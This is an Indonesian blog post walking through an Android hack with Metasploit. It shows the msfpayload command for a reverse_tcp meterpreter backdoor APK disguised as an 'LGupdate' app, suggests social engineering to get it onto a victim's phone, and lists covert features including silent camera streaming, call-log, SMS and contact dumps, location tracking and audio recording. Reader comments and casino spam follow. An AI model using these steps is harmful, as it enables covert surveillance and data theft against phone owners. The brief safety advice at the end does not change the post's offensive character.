Tidak ada yang spesial dari tulisan kali ini, sekedar mengisi waktu luang di sela “clinic time”, sekaligus melunasi permintaan dari beberapa teman untuk hacking dengan target android.
Lab yang dibuat untuk percobaan kali ini sebagai berikut:
1. Attacker: Kali Linux 1.09a Persistence USB dijalankan pada netbook Asus eeePC seashell 1015PX
2. Victim: Android JellyBean (Sony Xperia M dual), Android KitKat (LG G3)
3. ISP: telkomsel flash ultima. Dibagi dengan android wifi tethering (LG G3)
4. Metasploit framework: Exploit: exploit/multi/handler; payload: android/meterpreter/reverse_tcp
Langkah:
1. Buat dulu payloadnya (backdoor) dengan perintah seperti berikut di bawah
msfpayload android/meterpreter/reverse_tcp lhost=nomorIP lport=nomorPort R > namaaplikasi.apk
2. Transfer file backdoornya ke target. Setelah perintah di atas dijalankan, maka pada kasus saya akan tercipta file apk dengan nama LGupdate.apk Selanjutnya tinggal bagaimana file tersebut bisa sampai ke smartphone android victim. (you could always try soceng).
3. Install file apk di smartphone victim. File apk yang diinstall akan berubah nama menjadi MainActivity. Saat di-tap maka penampakan yang muncul di smartphone target kurang lebihnya seperti berikut:
4. Siapkan Modul Exploit. Ketikkan msfconsole pada terminal diikuti dengan perintah seperti berikut:
Pada percobaan eksploitasi saya di beberapa kesempatan awal sempat gagal dan keluar output error message –> meterpreter session closed. Reason: Died.
Jika tercipta koneksi, maka akan muncul pesan “meterpreter session opened” dan…
Bingo!!!
Konsol msf > akan berubah menjadi konsol meterpreter >
Lantas apa saja yang bisa kita lakukan dengan meng-hack android dari metasploit? Ada banyak. Bahkan lebih banyak daripada menghack distro linux lainnya.
1. Webcam Snap dan Webcam Stream. Kita bisa mengeksploitasi kamera depan dan kamera belakang pada smartphone target. Hebatnya lagi, beda dengan proses snapping dan streaming camera di netbook atau notebook, di smartphone android benar-benar stealth karena tidak ada lampu indikator yang menyala saat kamera sedang aktif dan juga tidak terjadi apa-apa pada layar target. Fitur ini sangat berbahaya.
Pada saat melakukan streaming camera, halaman browser akan terbuka dan proses paparazzi akan terus berjalan sampai dihentikan manual. Baik kamera depan maupun kamera belakang bisa dipilih mana saja yang diinginkan.
2. Dump call log, sms & contact. Hal berbahaya lainnya adalah hacker bisa mengakses data credential kita seperti berikut.
Hasil dumpingnya juga sangat memuaskan. Semua contact akan muncul, dan urutannya sesuai dengan urutan kita memasukkan contact.
Selain dari proses dumping di atas, kita juga bisa mengetahui lokasi seseorang berdasarkan fitur geolocation dan kemudian mengecek mapping lokasi tersebut secara online…
3. Merekam suara victim. Kita dapat menyesuaikan waktu yang diinginkan saat proses perekaman. Hasilnya akan tersimpan dengan format ekstensi wav
Masih banyak metode post modul lainnya yang bisa dicoba, silakan bereksperimen dan mengeksplorasi.
Good luck!!!
Pesan moralnya: Jangan pernah menginstall aplikasi android dari sumber yang tidak terpercaya, bahkan di google play store pun masih bisa ada celah keamanan seperti di atas. Pastikan menggunakan antivirus seperti avast, mcafee dsb. (walaupun juga tidak menjamin keamanan, setidaknya bisa sedikit memfilter koneksi).
Minimalisir penggunaan transaksi online melalui smartphone android.
Jangan coba-coba bawa smartphone ke kamar mandi
Dan jangan menyimpan konten dewasa pribadi pada smartphone













Kali command udah saya masukin bener tapi hasil yang keluar itu error running command webcam_chat itu kenapa, yah?
BalasHapusbikin grup WA nya ajh bro biar kita share ilmu..sangat berguna.thank's
BalasHapusOk gan
HapusKalo gua jalanin sintak nya dengan Termux bukan Langsung dengan Linux masih bisa ga ?
BalasHapusGan langsung wa gua aja ya , 089644262180
BalasHapusHow casinos work - FilmFileEurope
BalasHapusThis 바셀티비 is a 메이저 놀이터 추천 look at the various casino 프랑스 리그 1 순위 games, where you can find the latest 사설 토토 운영 넷마블 gambling news, reviews and 샤오 미 토토 news, including more casinos and bonuses for